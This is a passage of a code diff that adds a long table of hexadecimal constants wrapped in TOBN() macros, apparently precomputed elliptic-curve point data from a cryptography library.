+     TOBN(0xdbd2e22b, 0x55418dd3), TOBN(0xeffb3c0d, 0xd3998242),
+     TOBN(0xdfa6077c, 0xc7bf3827), TOBN(0xf2165bcb, 0x47f8238f),
+     TOBN(0xfe37cf68, 0x8564d554), TOBN(0xe5f825c4, 0x0a81fb98),
+     TOBN(0x43cc4f67, 0xffed4d6f), TOBN(0xbc609578, 0xb50a34b0),
+     TOBN(0x8aa8fcf9, 0x5041faf1), TOBN(0x5659f053, 0x651773b6),
+     TOBN(0xe87582c3, 0x6044d63b), TOBN(0xa6089409, 0x0cdb0ca0),
+     TOBN(0x8c993e0f, 0xbfb2bcf6), TOBN(0xfc64a719, 0x45985cfc),
+     TOBN(0x15c4da80, 0x83dbedba), TOBN(0x804ae112, 0x2be67df7),
+     TOBN(0xda4c9658, 0xa23defde), TOBN(0x12002ddd, 0x5156e0d3),
+     TOBN(0xe68eae89, 0x5dd21b96), TOBN(0x8b99f28b, 0xcf44624d),
+     TOBN(0x0ae00808, 0x1ec8897a), TOBN(0xdd0a9303, 0x6712f76e),
+     TOBN(0x96237522, 0x4e233de4), TOBN(0x192445b1, 0x2b36a8a5),
+     TOBN(0xabf9ff74, 0x023993d9), TOBN(0x21f37bf4, 0x2aad4a8f),
+     TOBN(0x340a4349, 0xf8bd2bbd), TOBN(0x1d902cd9, 0x4868195d),
+     TOBN(0x3d27bbf1, 0xe5fdb6f1), TOBN(0x7a5ab088, 0x124f9f1c),
+     TOBN(0xc466ab06, 0xf7a09e03), TOBN(0x2f8a1977, 0x31f2c123),
+     TOBN(0xda355dc7, 0x041b6657), TOBN(0xcb840d12, 0x8ece2a7c),
+     TOBN(0xb600ad9f, 0x7db32675), TOBN(0x78fea133, 0x07a06f1b),
+     TOBN(0x5d032269, 0xb31f6094), TOBN(0x07753ef5, 0x83ec37aa),
+     TOBN(0x03485aed, 0x9c0bea78), TOBN(0x41bb3989, 0xbc3f4524),
+     TOBN(0x09403761, 0x697f726d), TOBN(0x6109beb3, 0xdf394820),
+     TOBN(0x804111ea, 0x3b6d1145), TOBN(0xb6271ea9, 0xa8582654),
+     TOBN(0x619615e6, 0x24e66562), TOBN(0xa2554945, 0xd7b6ad9c),
+     TOBN(0xd9c4985e, 0x99bfe35f), TOBN(0x9770ccc0, 0x7b51cdf6),
+     TOBN(0x7c327013, 0x92881832), TOBN(0x8777d45f, 0x286b26d1),
+     TOBN(0x9bbeda22, 0xd847999d), TOBN(0x03aa33b6, 0xc3525d32),
+     TOBN(0x4b7b96d4, 0x28a959a1), TOBN(0xbb3786e5, 0x31e5d234),
+     TOBN(0xaeb5d3ce, 0x6961f247), TOBN(0x20aa85af, 0x02f93d3f),
+     TOBN(0x9cd1ad3d, 0xd7a7ae4f), TOBN(0xbf6688f0, 0x781adaa8),
+     TOBN(0xb1b40e86, 0x7469cead), TOBN(0x1904c524, 0x309fca48),
+     TOBN(0x9b7312af, 0x4b54bbc7), TOBN(0xbe24bf8f, 0x593affa2),
+     TOBN(0xbe5e0790, 0xbd98764b), TOBN(0xa0f45f17, 0xa26e299e),
+     TOBN(0x4af0d2c2, 0x6b8fe4c7), TOBN(0xef170db1, 0x8ae8a3e6),
+     TOBN(0x0e8d61a0, 0x29e0ccc1), TOBN(0xcd53e87e, 0x60ad36ca),
+     TOBN(0x328c6623, 0xc8173822), TOBN(0x7ee1767d, 0xa496be55),
+     TOBN(0x89f13259, 0x648945af), TOBN(0x9e45a5fd, 0x25c8009c),
+     TOBN(0xaf2febd9, 0x1f61ab8c), TOBN(0x43f6bc86, 0x8a275385),
+     TOBN(0x87792348, 0xf2142e79), TOBN(0x17d89259, 0xc6e6238a),
+     TOBN(0x7536d2f6, 0x4a839d9b), TOBN(0x1f428fce, 0x76a1fbdc),
+     TOBN(0x1c109601, 0x0db06dfe), TOBN(0xbfc16bc1, 0x50a3a3cc),
+     TOBN(0xf9cbd9ec, 0x9b30f41b), TOBN(0x5b5da0d6, 0x00138cce),
+     TOBN(0xec1d0a48, 0x56ef96a7), TOBN(0xb47eb848, 0x982bf842),
+     TOBN(0x66deae32, 0xec3f700d), TOBN(0x4e43c42c, 0xaa1181e0),
+     TOBN(0xa1d72a31, 0xd1a4aa2a), TOBN(0x440d4668, 0xc004f3ce),
+     TOBN(0x0d6a2d3b, 0x45fe8a7a), TOBN(0x820e52e2, 0xfb128365),
+     TOBN(0x29ac5fcf, 0x25e51b09), TOBN(0x180cd2bf, 0x2023d159),
+     TOBN(0xa9892171, 0xa1ebf90e), TOBN(0xf97c4c87, 0x7c132181),
+     TOBN(0x9f1dc724, 0xc03dbb7e), TOBN(0xae043765, 0x018cbbe4),
+     TOBN(0xfb0b2a36, 0x0767d153), TOBN(0xa8e2f4d6, 0x249cbaeb),
+     TOBN(0x172a5247, 0xd95ea168), TOBN(0x1758fada, 0x2970764a),
+     TOBN(0xac803a51, 0x1d978169), TOBN(0x299cfe2e, 0xde77e01b),
+     TOBN(0x652a1e17, 0xb0a98927), TOBN(0x2e26e1d1, 0x20014495),
+     TOBN(0x7ae0af9f, 0x7175b56a), TOBN(0xc2e22a80, 0xd64b9f95),
+     TOBN(0x4d0ff9fb, 0xd90a060a), TOBN(0x496a27db, 0xbaf38085),
+     TOBN(0x32305401, 0xda776bcf), TOBN(0xb8cdcef6, 0x725f209e),
+     TOBN(0x61ba0f37, 0x436a0bba), TOBN(0x263fa108, 0x76860049),
+     TOBN(0x92beb98e, 0xda3542cf), TOBN(0xa2d4d14a, 0xd5849538),
+     TOBN(0x989b9d68, 0x12e9a1bc), TOBN(0x61d9075c, 0x5f6e3268),
+     TOBN(0x352c6aa9, 0x99ace638), TOBN(0xde4e4a55, 0x920f43ff),
+     TOBN(0xe5e4144a, 0xd673c017), TOBN(0x667417ae, 0x6f6e05ea),
+     TOBN(0x613416ae, 0xdcd1bd56), TOBN(0x5eb36201, 0x86693711),
+     TOBN(0x2d7bc504, 0x3a1aa914), TOBN(0x175a1299, 0x76dc5975),
+     TOBN(0xe900e0f2, 0x3fc8125c), TOBN(0x569ef68c, 0x11198875),
+     TOBN(0x9012db63, 0x63a113b4), TOBN(0xe3bd3f56, 0x98835766),
+     TOBN(0xa5c94a52, 0x76412dea), TOBN(0xad9e2a09, 0xaa735e5c),
+     TOBN(0x405a984c, 0x508b65e9), TOBN(0xbde4a1d1, 0x6df1a0d1),
+     TOBN(0x1a9433a1, 0xdfba80da), TOBN(0xe9192ff9, 0x9440ad2e),
+     TOBN(0x9f649696, 0x5099fe92), TOBN(0x25ddb65c, 0x0b27a54a),
+     TOBN(0x178279dd, 0xc590da61), TOBN(0x5479a999, 0xfbde681a),
+     TOBN(0xd0e84e05, 0x013fe162), TOBN(0xbe11dc92, 0x632d471b),
+     TOBN(0xdf0b0c45, 0xfc0e089f), TOBN(0x04fb15b0, 0x4c144025),
+     TOBN(0xa61d5fc2, 0x13c99927), TOBN(0xa033e9e0, 0x3de2eb35),
+     TOBN(0xf8185d5c, 0xb8dacbb4), TOBN(0x9a88e265, 0x8644549d),
+     TOBN(0xf717af62, 0x54671ff6), TOBN(0x4bd4241b, 0x5fa58603),
+     TOBN(0x06fba40b, 0xe67773c0), TOBN(0xc1d933d2, 0x6a2847e9),
+     TOBN(0xf4f5acf3, 0x689e2c70), TOBN(0x92aab0e7, 0x46bafd31),
+     TOBN(0x798d76aa, 0x3473f6e5), TOBN(0xcc6641db, 0x93141934),
+     TOBN(0xcae27757, 0xd31e535e), TOBN(0x04cc43b6, 0x87c2ee11),
+     TOBN(0x8d1f9675, 0x2e029ffa), TOBN(0xc2150672, 0xe4cc7a2c),
+     TOBN(0x3b03c1e0, 0x8d68b013), TOBN(0xa9d6816f, 0xedf298f3),
+     TOBN(0x1bfbb529, 0xa2804464), TOBN(0x95a52fae, 0x5db22125),
+     TOBN(0x55b32160, 0x0e1cb64e), TOBN(0x004828f6, 0x7e7fc9fe),
+     TOBN(0x13394b82, 0x1bb0fb93), TOBN(0xb6293a2d, 0x35f1a920),
+     TOBN(0xde35ef21, 0xd145d2d9), TOBN(0xbe6225b3, 0xbb8fa603),
+     TOBN(0x00fc8f6b, 0x32cf252d), TOBN(0xa28e52e6, 0x117cf8c2),
+     TOBN(0x9d1dc89b, 0x4c371e6d), TOBN(0xcebe0675, 0x36ef0f28),
+     TOBN(0x5de05d09, 0xa4292f81), TOBN(0xa8303593, 0x353e3083),
+     TOBN(0xa1715b0a, 0x7e37a9bb), TOBN(0x8c56f61e, 0x2b8faec3),
+     TOBN(0x52507431, 0x33c9b102), TOBN(0x0130cefc, 0xa44431f0),
+     TOBN(0x56039fa0, 0xbd865cfb), TOBN(0x4b03e578, 0xbc5f1dd7),
+     TOBN(0x40edf2e4, 0xbabe7224), TOBN(0xc752496d, 0x3a1988f6),
+     TOBN(0xd1572d3b, 0x564beb6b), TOBN(0x0db1d110, 0x39a1c608),
+     TOBN(0x568d1934, 0x16f60126), TOBN(0x05ae9668, 0xf354af33),
+     TOBN(0x19de6d37, 0xc92544f2), TOBN(0xcc084353, 0xa35837d5),
+     TOBN(0xcbb6869c, 0x1a514ece), TOBN(0xb633e728, 0x2e1d1066),
+     TOBN(0xf15dd69f, 0x936c581c), TOBN(0x96e7b8ce, 0x7439c4f9),
+     TOBN(0x5e676f48, 0x2e448a5b), TOBN(0xb2ca7d5b, 0xfd916bbb),
+     TOBN(0xd55a2541, 0xf5024025), TOBN(0x47bc5769, 0xe4c2d937),
+     TOBN(0x7d31b92a, 0x0362189f), TOBN(0x83f3086e, 0xef7816f9),
+     TOBN(0xf9f46d94, 0xb587579a), TOBN(0xec2d22d8, 0x30e76c5f),
+     TOBN(0x27d57461, 0xb000ffcf), TOBN(0xbb7e65f9, 0x364ffc2c),
+     TOBN(0x7c7c9477, 0x6652a220), TOBN(0x61618f89, 0xd696c981),
+     TOBN(0x5021701d, 0x89effff3), TOBN(0xf2c8ff8e, 0x7c314163),
+     TOBN(0x2da413ad, 0x8efb4d3e), TOBN(0x937b5adf, 0xce176d95),
+     TOBN(0x22867d34, 0x2a67d51c), TOBN(0x262b9b10, 0x18eb3ac9),
+     TOBN(0x4e314fe4, 0xc43ff28b), TOBN(0x76476627, 0x6a664e7a),
+     TOBN(0x3e90e40b, 0xb7a565c2), TOBN(0x8588993a, 0xc1acf831),
+     TOBN(0xd7b501d6, 0x8f938829), TOBN(0x996627ee, 0x3edd7d4c),
+     TOBN(0x37d44a62, 0x90cd34c7), TOBN(0xa8327499, 0xf3833e8d),
+     TOBN(0x2e18917d, 0x4bf50353), TOBN(0x85dd726b, 0x556765fb),
+     TOBN(0x54fe65d6, 0x93d5ab66), TOBN(0x3ddbaced, 0x915c25fe),
+     TOBN(0xa799d9a4, 0x12f22e85), TOBN(0xe2a24867, 0x6d06f6bc),
+     TOBN(0xf4f1ee56, 0x43ca1637), TOBN(0xfda2828b, 0x61ece30a),
+     TOBN(0x758c1a3e, 0xa2dee7a6), TOBN(0xdcde2f3c, 0x734b2284),
+     TOBN(0xaba445d2, 0x4eaba6ad), TOBN(0x35aaf668, 0x76cee0a7),
+     TOBN(0x7e0b04a9, 0xe5aa049a), TOBN(0xe74083ad, 0x91103e84),
+     TOBN(0xbeb183ce, 0x40afecc3), TOBN(0x6b89de9f, 0xea043f7a),}
+    ,
+    {TOBN(0x0e299d23, 0xfe67ba66), TOBN(0x91450760, 0x93cf2f34),
+     TOBN(0xf45b5ea9, 0x97fcf913), TOBN(0x5be00843, 0x8bd7ddda),
+     TOBN(0x358c3e05, 0xd53ff04d), TOBN(0xbf7ccdc3, 0x5de91ef7),
+     TOBN(0xad684dbf, 0xb69ec1a0), TOBN(0x367e7cf2, 0x801fd997),
+     TOBN(0x0ca1f3b7, 0xb0dc8595), TOBN(0x27de4608, 0x9f1d9f2e),
+     TOBN(0x1af3bf39, 0xbadd82a7), TOBN(0x79356a79, 0x65862448),
+     TOBN(0xc0602345, 0xf5f9a052), TOBN(0x1a8b0f89, 0x139a42f9),
+     TOBN(0xb53eee42, 0x844d40fc), TOBN(0x93b0bfe5, 0x4e5b6368),
+     TOBN(0x5434dd02, 0xc024789c), TOBN(0x90dca9ea, 0x41b57bfc),
+     TOBN(0x8aa898e2, 0x243398df), TOBN(0xf607c834, 0x894a94bb),
+     TOBN(0xbb07be97, 0xc2c99b76), TOBN(0x6576ba67, 0x18c29302),
+     TOBN(0x3d79efcc, 0xe703a88c), TOBN(0xf259ced7, 0xb6a0d106),
+     TOBN(0x0f893a5d, 0xc8de610b), TOBN(0xe8c515fb, 0x67e223ce),
+     TOBN(0x7774bfa6, 0x4ead6dc5), TOBN(0x89d20f95, 0x925c728f),
+     TOBN(0x7a1e0966, 0x098583ce), TOBN(0xa2eedb94, 0x93f2a7d7),
+     TOBN(0x1b282097, 0x4c304d4a), TOBN(0x0842e3da, 0xc077282d),
+     TOBN(0xe4d972a3, 0x3b9e2d7b), TOBN(0x7cc60b27, 0xc48218ff),
+     TOBN(0x8fc70838, 0x84149d91), TOBN(0x5c04346f, 0x2f461ecc),
+     TOBN(0xebe9fdf2, 0x614650a9), TOBN(0x5e35b537, 0xc1f666ac),
+     TOBN(0x645613d1, 0x88babc83), TOBN(0x88cace3a, 0xc5e1c93e),
+     TOBN(0x209ca375, 0x3de92e23), TOBN(0xccb03cc8, 0x5fbbb6e3),
+     TOBN(0xccb90f03, 0xd7b1487e), TOBN(0xfa9c2a38, 0xc710941f),
+     TOBN(0x756c3823, 0x6724ceed), TOBN(0x3a902258, 0x192d0323),
+     TOBN(0xb150e519, 0xea5e038e), TOBN(0xdcba2865, 0xc7427591),
+     TOBN(0xe549237f, 0x78890732), TOBN(0xc443bef9, 0x53fcb4d9),
+     TOBN(0x9884d8a6, 0xeb3480d6), TOBN(0x8a35b6a1, 0x3048b186),
+     TOBN(0xb4e44716, 0x65e9a90a), TOBN(0x45bf380d, 0x653006c0),
+     TOBN(0x8f3f820d, 0x4fe9ae3b), TOBN(0x244a35a0, 0x979a3b71),
+     TOBN(0xa1010e9d, 0x74cd06ff), TOBN(0x9c17c7df, 0xaca3eeac),
+     TOBN(0x74c86cd3, 0x8063aa2b), TOBN(0x8595c4b3, 0x734614ff),
+     TOBN(0xa3de00ca, 0x990f62cc), TOBN(0xd9bed213, 0xca0c3be5),
+     TOBN(0x7886078a, 0xdf8ce9f5), TOBN(0xddb27ce3, 0x5cd44444),
+     TOBN(0xed374a66, 0x58926ddd), TOBN(0x138b2d49, 0x908015b8),
+     TOBN(0x886c6579, 0xde1f7ab8), TOBN(0x888b9aa0, 0xc3020b7a),
+     TOBN(0xd3ec034e, 0x3a96e355), TOBN(0xba65b0b8, 0xf30fbe9a),
+     TOBN(0x064c8e50, 0xff21367a), TOBN(0x1f508ea4, 0x0b04b46e),
+     TOBN(0x98561a49, 0x747c866c), TOBN(0xbbb1e5fe, 0x0518a062),
+     TOBN(0x20ff4e8b, 0xecdc3608), TOBN(0x7f55cded, 0x20184027),
+     TOBN(0x8d73ec95, 0xf38c85f0), TOBN(0x5b589fdf, 0x8bc3b8c3),
+     TOBN(0xbe95dd98, 0x0f12b66f), TOBN(0xf5bd1a09, 0x0e338e01),
+     TOBN(0x65163ae5, 0x5e915918), TOBN(0x6158d6d9, 0x86f8a46b),
+     TOBN(0x8466b538, 0xeeebf99c), TOBN(0xca8761f6, 0xbca477ef),
+     TOBN(0xaf3449c2, 0x9ebbc601), TOBN(0xef3b0f41, 0xe0c3ae2f),
+     TOBN(0xaa6c577d, 0x5de63752), TOBN(0xe9166601, 0x64682a51),
+     TOBN(0x5a3097be, 0xfc15aa1e), TOBN(0x40d12548, 0xb54b0745),
+     TOBN(0x5bad4706, 0x519a5f12), TOBN(0xed03f717, 0xa439dee6),
+     TOBN(0x0794bb6c, 0x4a02c499), TOBN(0xf725083d, 0xcffe71d2),
+     TOBN(0x2cad7519, 0x0f3adcaf), TOBN(0x7f68ea1c, 0x43729310),
+     TOBN(0xe747c8c7, 0xb7ffd977), TOBN(0xec104c35, 0x80761a22),
+     TOBN(0x8395ebaf, 0x5a3ffb83), TOBN(0xfb3261f4, 0xe4b63db7),
+     TOBN(0x53544960, 0xd883e544), TOBN(0x13520d70, 0x8cc2eeb8),
+     TOBN(0x08f6337b, 0xd3d65f99), TOBN(0x83997db2, 0x781cf95b),
+     TOBN(0xce6ff106, 0x0dbd2c01), TOBN(0x4f8eea6b, 0x1f9ce934),
+     TOBN(0x546f7c4b, 0x0e993921), TOBN(0x6236a324, 0x5e753fc7),
+     TOBN(0x65a41f84, 0xa16022e9), TOBN(0x0c18d878, 0x43d1dbb2),
+     TOBN(0x73c55640, 0x2d4cef9c), TOBN(0xa0428108, 0x70444c74),
+     TOBN(0x68e4f15e, 0x9afdfb3c), TOBN(0x49a56143, 0x5bdfb6df),
+     TOBN(0xa9bc1bd4, 0x5f823d97), TOBN(0xbceb5970, 0xea111c2a),
+     TOBN(0x366b455f, 0xb269bbc4), TOBN(0x7cd85e1e, 0xe9bc5d62),
+     TOBN(0xc743c41c, 0x4f18b086), TOBN(0xa4b40990, 0x95294fb9),
+     TOBN(0x9c7c581d, 0x26ee8382), TOBN(0xcf17dcc5, 0x359d638e),
+     TOBN(0xee8273ab, 0xb728ae3d), TOBN(0x1d112926, 0xf821f047),
+     TOBN(0x11498477, 0x50491a74), TOBN(0x687fa761, 0xfde0dfb9),
+     TOBN(0x2c258022, 0x7ea435ab), TOBN(0x6b8bdb94, 0x91ce7e3f),
+     TOBN(0x4c5b5dc9, 0x3bf834aa), TOBN(0x04371819, 0x4f6c7e4b),
+     TOBN(0xc284e00a, 0x3736bcad), TOBN(0x0d881118, 0x21ae8f8d),
+     TOBN(0xf9cf0f82, 0xf48c8e33), TOBN(0xa11fd075, 0xa1bf40db),
+     TOBN(0xdceab0de, 0xdc2733e5), TOBN(0xc560a8b5, 0x8e986bd7),
+     TOBN(0x48dd1fe2, 0x3929d097), TOBN(0x3885b290, 0x92f188f1),
+     TOBN(0x0f2ae613, 0xda6fcdac), TOBN(0x9054303e, 0xb662a46c),
+     TOBN(0xb6871e44, 0x0738042a), TOBN(0x98e6a977, 0xbdaf6449),
+     TOBN(0xd8bc0650, 0xd1c9df1b), TOBN(0xef3d6451, 0x36e098f9),
+     TOBN(0x03fbae82, 0xb6d72d28), TOBN(0x77ca9db1, 0xf5d84080),
+     TOBN(0x8a112cff, 0xa58efc1c), TOBN(0x518d761c, 0xc564cb4a),
+     TOBN(0x69b5740e, 0xf0d1b5ce), TOBN(0x717039cc, 0xe9eb1785),
+     TOBN(0x3fe29f90, 0x22f53382), TOBN(0x8e54ba56, 0x6bc7c95c),
+     TOBN(0x9c806d8a, 0xf7f91d0f), TOBN(0x3b61b0f1, 0xa82a5728),
+     TOBN(0x4640032d, 0x94d76754), TOBN(0x273eb5de, 0x47d834c6),
+     TOBN(0x2988abf7, 0x7b4e4d53), TOBN(0xb7ce66bf, 0xde401777),
+     TOBN(0x9fba6b32, 0x715071b3), TOBN(0x82413c24, 0xad3a1a98),
+     TOBN(0x5b7fc8c4, 0xe0e8ad93), TOBN(0xb5679aee, 0x5fab868d),
+     TOBN(0xb1f9d2fa, 0x2b3946f3), TOBN(0x458897dc, 0x5685b50a),
+     TOBN(0x1e98c930, 0x89d0caf3), TOBN(0x39564c5f, 0x78642e92),
+     TOBN(0x1b77729a, 0x0dbdaf18), TOBN(0xf9170722, 0x579e82e6),
+     TOBN(0x680c0317, 0xe4515fa5), TOBN(0xf85cff84, 0xfb0c790f),
+     TOBN(0xc7a82aab, 0x6d2e0765), TOBN(0x7446bca9, 0x35c82b32),
+     TOBN(0x5de607aa, 0x6d63184f), TOBN(0x7c1a46a8, 0x262803a6),
+     TOBN(0xd218313d, 0xaebe8035), TOBN(0x92113ffd, 0xc73c51f8),
+     TOBN(0x4b38e083, 0x12e7e46c), TOBN(0x69d0a37a, 0x56126bd5),
+     TOBN(0xfb3f324b, 0x73c07e04), TOBN(0xa0c22f67, 0x8fda7267),
+     TOBN(0x8f2c0051, 0x4d2c7d8f), TOBN(0xbc45ced3, 0xcbe2cae5),
+     TOBN(0xe1c6cf07, 0xa8f0f277), TOBN(0xbc392312, 0x1eb99a98),
+     TOBN(0x75537b7e, 0x3cc8ac85), TOBN(0x8d725f57, 0xdd02753b),
+     TOBN(0xfd05ff64, 0xb737df2f), TOBN(0x55fe8712, 0xf6d2531d),
+     TOBN(0x57ce04a9, 0x6ab6b01c), TOBN(0x69a02a89, 0x7cd93724),
+     TOBN(0x4f82ac35, 0xcf86699b), TOBN(0x8242d3ad, 0x9cb4b232),
+     TOBN(0x713d0f65, 0xd62105e5), TOBN(0xbb222bfa, 0x2d29be61),
+     TOBN(0xf2f9a79e, 0x6cfbef09), TOBN(0xfc24d8d3, 0xd5d6782f),
+     TOBN(0x5db77085, 0xd4129967), TOBN(0xdb81c3cc, 0xdc3c2a43),
+     TOBN(0x9d655fc0, 0x05d8d9a3), TOBN(0x3f5d057a, 0x54298026),
+     TOBN(0x1157f56d, 0x88c54694), TOBN(0xb26baba5, 0x9b09573e),
+     TOBN(0x2cab03b0, 0x22adffd1), TOBN(0x60a412c8, 0xdd69f383),
+     TOBN(0xed76e98b, 0x54b25039), TOBN(0xd4ee67d3, 0x687e714d),
+     TOBN(0x87739648, 0x7b00b594), TOBN(0xce419775, 0xc9ef709b),
+     TOBN(0x40f76f85, 0x1c203a40), TOBN(0x30d352d6, 0xeafd8f91),
+     TOBN(0xaf196d3d, 0x95578dd2), TOBN(0xea4bb3d7, 0x77cc3f3d),
+     TOBN(0x42a5bd03, 0xb98e782b), TOBN(0xac958c40, 0x0624920d),
+     TOBN(0xb838134c, 0xfc56fcc8), TOBN(0x86ec4ccf, 0x89572e5e),
+     TOBN(0x69c43526, 0x9be47be0), TOBN(0x323b7dd8, 0xcb28fea1),
+     TOBN(0xfa5538ba, 0x3a6c67e5), TOBN(0xef921d70, 0x1d378e46),
+     TOBN(0xf92961fc, 0x3c4b880e), TOBN(0x3f6f914e, 0x98940a67),
+     TOBN(0xa990eb0a, 0xfef0ff39), TOBN(0xa6c2920f, 0xf0eeff9c),
+     TOBN(0xca804166, 0x51b8d9a3), TOBN(0x42531bc9, 0x0ffb0db1),
+     TOBN(0x72ce4718, 0xaa82e7ce), TOBN(0x6e199913, 0xdf574741),
+     TOBN(0xd5f1b13d, 0xd5d36946), TOBN(0x8255dc65, 0xf68f0194),
+     TOBN(0xdc9df4cd, 0x8710d230), TOBN(0x3453c20f, 0x138c1988),
+     TOBN(0x9af98dc0, 0x89a6ef01), TOBN(0x4dbcc3f0, 0x9857df85),
+     TOBN(0x34805601, 0x5c1ad924), TOBN(0x40448da5, 0xd0493046),
+     TOBN(0xf629926d, 0x4ee343e2), TOBN(0x6343f1bd, 0x90e8a301),
+     TOBN(0xefc93491, 0x40815b3f), TOBN(0xf882a423, 0xde8f66fb),
+     TOBN(0x3a12d5f4, 0xe7db9f57), TOBN(0x7dfba38a, 0x3c384c27),
+     TOBN(0x7a904bfd, 0x6fc660b1), TOBN(0xeb6c5db3, 0x2773b21c),
+     TOBN(0xc350ee66, 0x1cdfe049), TOBN(0x9baac0ce, 0x44540f29),
+     TOBN(0xbc57b6ab, 0xa5ec6aad), TOBN(0x167ce8c3, 0x0a7c1baa),
+     TOBN(0xb23a03a5, 0x53fb2b56), TOBN(0x6ce141e7, 0x4e057f78),
+     TOBN(0x796525c3, 0x89e490d9), TOBN(0x0bc95725, 0xa31a7e75),
+     TOBN(0x1ec56791, 0x1220fd06), TOBN(0x716e3a3c, 0x408b0bd6),
+     TOBN(0x31cd6bf7, 0xe8ebeba9), TOBN(0xa7326ca6, 0xbee6b670),
+     TOBN(0x3d9f851c, 0xcd090c43), TOBN(0x561e8f13, 0xf12c3988),
+     TOBN(0x50490b6a, 0x904b7be4), TOBN(0x61690ce1, 0x0410737b),
+     TOBN(0x299e9a37, 0x0f009052), TOBN(0x258758f0, 0xf026092e),
+     TOBN(0x9fa255f3, 0xfdfcdc0f), TOBN(0xdbc9fb1f, 0xc0e1bcd2),
+     TOBN(0x35f9dd6e, 0x24651840), TOBN(0xdca45a84, 0xa5c59abc),
+     TOBN(0x103d396f, 0xecca4938), TOBN(0x4532da0a, 0xb97b3f29),
+     TOBN(0xc4135ea5, 0x1999a6bf), TOBN(0x3aa9505a, 0x5e6bf2ee),
+     TOBN(0xf77cef06, 0x3f5be093), TOBN(0x97d1a0f8, 0xa943152e),
+     TOBN(0x2cb0ebba, 0x2e1c21dd), TOBN(0xf41b29fc, 0x2c6797c4),
+     TOBN(0xc6e17321, 0xb300101f), TOBN(0x4422b0e9, 0xd0d79a89),
+     TOBN(0x49e4901c, 0x92f1bfc4), TOBN(0x06ab1f8f, 0xe1e10ed9),
+     TOBN(0x84d35577, 0xdb2926b8), TOBN(0xca349d39, 0x356e8ec2),
+     TOBN(0x70b63d32, 0x343bf1a9), TOBN(0x8fd3bd28, 0x37d1a6b1),
+     TOBN(0x0454879c, 0x316865b4), TOBN(0xee959ff6, 0xc458efa2),
+     TOBN(0x0461dcf8, 0x9706dc3f), TOBN(0x737db0e2, 0x164e4b2e),
+     TOBN(0x09262680, 0x2f8843c8), TOBN(0x54498bbc, 0x7745e6f6),
+     TOBN(0x359473fa, 0xa29e24af), TOBN(0xfcc3c454, 0x70aa87a1),
+     TOBN(0xfd2c4bf5, 0x00573ace), TOBN(0xb65b514e, 0x28dd1965),
+     TOBN(0xe46ae7cf, 0x2193e393), TOBN(0x60e9a4e1, 0xf5444d97),
+     TOBN(0xe7594e96, 0x00ff38ed), TOBN(0x43d84d2f, 0x0a0e0f02),
+     TOBN(0x8b6db141, 0xee398a21), TOBN(0xb88a56ae, 0xe3bcc5be),
+     TOBN(0x0a1aa52f, 0x373460ea), TOBN(0x20da1a56, 0x160bb19b),
+     TOBN(0xfb54999d, 0x65bf0384), TOBN(0x71a14d24, 0x5d5a180e),
+     TOBN(0xbc44db7b, 0x21737b04), TOBN(0xd84fcb18, 0x01dd8e92),
+     TOBN(0x80de937b, 0xfa44b479), TOBN(0x53505499, 0x5c98fd4f),
+     TOBN(0x1edb12ab, 0x28f08727), TOBN(0x4c58b582, 0xa5f3ef53),
+     TOBN(0xbfb236d8, 0x8327f246), TOBN(0xc3a3bfaa, 0x4d7df320),
+     TOBN(0xecd96c59, 0xb96024f2), TOBN(0xfc293a53, 0x7f4e0433),
+     TOBN(0x5341352b, 0x5acf6e10), TOBN(0xc50343fd, 0xafe652c3),
+     TOBN(0x4af3792d, 0x18577a7f), TOBN(0xe1a4c617, 0xaf16823d),
+     TOBN(0x9b26d0cd, 0x33425d0a), TOBN(0x306399ed, 0x9b7bc47f),
+     TOBN(0x2a792f33, 0x706bb20b), TOBN(0x31219614, 0x98111055),
+     TOBN(0x864ec064, 0x87f5d28b), TOBN(0x11392d91, 0x962277fd),
+     TOBN(0xb5aa7942, 0xbb6aed5f), TOBN(0x080094dc, 0x47e799d9),
+     TOBN(0x4afa588c, 0x208ba19b), TOBN(0xd3e7570f, 0x8512f284),
+     TOBN(0xcbae64e6, 0x02f5799a), TOBN(0xdeebe7ef, 0x514b9492),
+     TOBN(0x30300f98, 0xe5c298ff), TOBN(0x17f561be, 0x3678361f),
+     TOBN(0xf52ff312, 0x98cb9a16), TOBN(0x6233c3bc, 0x5562d490),
+     TOBN(0x7bfa15a1, 0x92e3a2cb), TOBN(0x961bcfd1, 0xe6365119),
+     TOBN(0x3bdd29bf, 0x2c8c53b1), TOBN(0x739704df, 0x822844ba),
+     TOBN(0x7dacfb58, 0x7e7b754b), TOBN(0x23360791, 0xa806c9b9),
+     TOBN(0xe7eb88c9, 0x23504452), TOBN(0x2983e996, 0x852c1783),
+     TOBN(0xdd4ae529, 0x958d881d), TOBN(0x026bae03, 0x262c7b3c),
+     TOBN(0x3a6f9193, 0x960b52d1), TOBN(0xd0980f90, 0x92696cfb),
+     TOBN(0x4c1f428c, 0xd5f30851), TOBN(0x94dfed27, 0x2a4f6630),
+     TOBN(0x4df53772, 0xfc5d48a4), TOBN(0xdd2d5a2f, 0x933260ce),
+     TOBN(0x574115bd, 0xd44cc7a5), TOBN(0x4ba6b20d, 0xbd12533a),
+     TOBN(0x30e93cb8, 0x243057c9), TOBN(0x794c486a, 0x14de320e),
+     TOBN(0xe925d4ce, 0xf21496e4), TOBN(0xf951d198, 0xec696331),
+     TOBN(0x9810e2de, 0x3e8d812f), TOBN(0xd0a47259, 0x389294ab),
+     TOBN(0x513ba2b5, 0x0e3bab66), TOBN(0x462caff5, 0xabad306f),
+     TOBN(0xe2dc6d59, 0xaf04c49e), TOBN(0x1aeb8750, 0xe0b84b0b),
+     TOBN(0xc034f12f, 0x2f7d0ca2), TOBN(0x6d2e8128, 0xe06acf2f),
+     TOBN(0x801f4f83, 0x21facc2f), TOBN(0xa1170c03, 0xf40ef607),
+     TOBN(0xfe0a1d4f, 0x7805a99c), TOBN(0xbde56a36, 0xcc26aba5),
+     TOBN(0x5b1629d0, 0x35531f40), TOBN(0xac212c2b, 0x9afa6108),
+     TOBN(0x30a06bf3, 0x15697be5), TOBN(0x6f0545dc, 0x2c63c7c1),
+     TOBN(0x5d8cb842, 0x7ccdadaf), TOBN(0xd52e379b, 0xac7015bb),
+     TOBN(0xc4f56147, 0xf462c23e), TOBN(0xd44a4298, 0x46bc24b0),
+     TOBN(0xbc73d23a, 0xe2856d4f), TOBN(0x61cedd8c, 0x0832bcdf),
+     TOBN(0x60953556, 0x99f241d7), TOBN(0xee4adbd7, 0x001a349d),
+     TOBN(0x0b35bf6a, 0xaa89e491), TOBN(0x7f0076f4, 0x136f7546),
+     TOBN(0xd19a18ba, 0x9264da3d), TOBN(0x6eb2d2cd, 0x62a7a28b),
